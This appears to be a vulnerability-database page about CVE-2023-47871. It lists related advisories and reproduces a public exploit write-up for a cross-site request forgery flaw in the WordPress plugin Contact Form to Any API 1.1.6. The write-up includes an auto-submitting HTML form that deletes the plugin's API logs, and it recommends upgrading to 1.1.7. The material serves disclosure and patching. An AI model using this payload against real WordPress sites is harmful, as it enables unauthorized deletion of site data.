| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| WordPress Contact Form To Any API 1.1.6 Cross Site Request Forgery Vulnerability | 12 Dec 202300:00 | – | zdt | |
| CVE-2023-47871 | 9 Dec 202411:46 | – | circl | |
| WordPress plugin Contact Form to Any API 安全漏洞 | 9 Dec 202400:00 | – | cnnvd | |
| CVE-2023-47871 | 9 Dec 202411:30 | – | cve | |
| CVE-2023-47871 WordPress Contact Form to Any API plugin <= 1.1.6 - Broken Access Control vulnerability | 9 Dec 202411:30 | – | cvelist | |
| EUVD-2023-51961 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-47871 | 9 Dec 202413:15 | – | nvd | |
| WordPress Contact Form to Any API Plugin <= 1.1.6 is vulnerable to Broken Access Control | 20 Nov 202300:00 | – | patchstack | |
| PT-2024-13527 · It Path Solutions · It Path Solutions Contact Form To Any Api | 9 Dec 202400:00 | – | ptsecurity | |
| CVE-2023-47871 | 23 May 202501:58 | – | redhatcve |
`# Exploit Title: WP Plugins Contact Form to Any API <= 1.1.6 - CSRF
# Date: 09-12-2023
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/
# Vendor Homepage: https://www.itpathsolutions.com/
# Version: 1.1.6
# Tested on: Windows, Linux
# CVE: CVE-2023-47871
# Product Description
Contact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.
# Vulnerability overview
The Wordpress plugins Contact Form to Any API <= 1.1.6 is vulnerable to Cross-Site Request Forgery in the Delete All Log function. This vulnerability could lead to unauthorized deletion of API Logs.
# Proof of Concept
<html>
<body>
<form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="cf7_to_any_api_bulk_log_delete" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
# Recommendation
Upgrade to version 1.1.7
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation